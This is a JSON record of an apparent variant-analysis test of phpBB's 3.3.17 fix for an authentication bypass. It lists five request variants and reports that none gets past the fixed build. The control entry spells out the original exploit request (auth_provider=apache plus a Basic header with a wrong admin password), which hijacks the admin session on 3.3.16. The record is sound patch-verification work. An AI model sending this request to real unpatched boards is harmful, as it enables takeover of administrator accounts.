{
  "variant_outcome": "no_bypass_found",
  "claim_outcome": "not_confirmed",
  "claim_block_reason": "no_bypass_found",
  "bypass_reproduced_on_fixed": false,
  "variant_reproduced_on_vulnerable": false,
  "validated_surface": "api_remote",
  "evidence_scope": "production_path",
  "claimed_impact_class": "authz_bypass",
  "observed_impact_class": "authz_bypass",
  "exploitability_confidence": "high",
  "attacker_controlled_input": "auth_provider=apache request parameter (GET/POST) plus HTTP Basic Authorization header (PHP_AUTH_USER set to an existing username, e.g. admin); password deliberately wrong (x). Register-flow candidate additionally supplies login_link_* POST data and registration fields.",
  "tested_variants": [
    {
      "id": "V1",
      "name": "register-flow residual attacker-steerable get_provider(auth_provider)",
      "entrypoint": "POST ucp.php?mode=register&auth_provider=apache (+ login_link_* POST + registration fields)",
      "code_path": "includes/ucp/ucp_register.php ~line 120 -> get_provider($request->variable('auth_provider','')) -> login_link_has_necessary_data() + link_account() (NO ->login() call)",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "vulnerable_result": "blocked",
      "vulnerable_session_u": "1",
      "is_bypass": false,
      "note": "Residual anti-pattern that the fix did not touch: the register flow still selects the provider from the request's auth_provider value. However, the register flow never calls ->login() on the selected provider and only calls session_create() for the NEW user, so the password-less apache sink is unreachable from it. Not a variant of the auth bypass on either version."
    },
    {
      "id": "V2",
      "name": "auth_provider forwarded through login_link redirect",
      "entrypoint": "POST ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1",
      "code_path": "ucp.php case login_link -> phpbb_redirect_to_controller forwards all GET params -> oauth::link_account() get_provider() NO arg (auth_provider ignored)",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "fixed_response_first_line": "HTTP/1.0 301 Moved Permanently",
      "is_bypass": false
    },
    {
      "id": "V3",
      "name": "direct controller link_account with auth_provider=apache in query",
      "entrypoint": "POST /app.php/user/oauth/link_account?auth_provider=apache&login_link_aikido=1 (+ Authorization: Basic admin:x)",
      "code_path": "oauth::link_account() -> get_provider() NO arg -> db::login('admin','x') -> password hash mismatch -> rejected",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "fixed_error_block_count": 1,
      "is_bypass": false,
      "note": "Controller never reads auth_provider; uses board-configured db provider; wrong password rejected."
    },
    {
      "id": "V4",
      "name": "oauth login controller with Basic header",
      "entrypoint": "GET /app.php/user/oauth/login/apache (+ Authorization: Basic admin:x)",
      "code_path": "oauth::login('apache') -> get_provider() NO arg -> instanceof phpbb\\auth\\provider\\oauth\\oauth guard -> throws HTTP 401",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "fixed_response_first_line": "HTTP/1.1 401 Unauthorized",
      "is_bypass": false
    },
    {
      "id": "V5",
      "name": "original exploit (control)",
      "entrypoint": "POST ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1 (+ Authorization: Basic admin:x)",
      "code_path": "3.3.16 ucp_login_link::main() get_provider(auth_provider) -> apache::login() LOGIN_SUCCESS -> session_create(admin user_id=2)",
      "vulnerable_result": "hijack",
      "vulnerable_session_u": "2",
      "vulnerable_acp_link_count": 2,
      "fixed_result_ucp_path": "blocked",
      "fixed_result_controller_path": "blocked",
      "fixed_session_u": "1",
      "is_bypass": false,
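      "note": "Control run: confirms that the test harness reaches the real Apache+mod_php boundary. 3.3.16 still hijacks the admin session, while 3.3.17 blocks the original exploit on both the ucp.php path and the controller path; is_bypass is false because nothing gets past the fixed build."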
    }
  ],
  "trigger_path": "No trigger path on the fixed build reaches the password-less apache::login() sink. The only residual attacker-steerable get_provider(auth_provider) call (in ucp_register.php) is not followed by ->login() + session_create() for an existing user. Every request-facing get_provider() call that IS followed by ->login() passes no argument, so it resolves to the board-configured auth_method.",
  "end_to_end_target_reached": true,
  "sanitizer_used": false,
  "crash_observed": false,
  "read_write_primitive_observed": false,
  "exploit_chain_demonstrated": false,
  "blocking_mitigation": "phpBB 3.3.17 fix (ticket/17659): login-link flow moved to phpbb/ucp/controller/oauth.php which resolves the provider via get_provider() with NO argument (board-configured auth_method, default db); the password-less apache provider is therefore unreachable from request-steered provider selection; the oauth login() controller is additionally guarded by instanceof phpbb\\auth\\provider\\oauth\\oauth.",
  "inferred": false,
  "runtime_manifest_present": true,
  "source_identity_present": true,
  "tested_vulnerable_commit": "555f0aaa6b892efb2e6b6edd2362302a3ef8b339",
  "tested_fixed_commit": "3508484fdc18cd97eeab229da830055c79fcc59e"
}
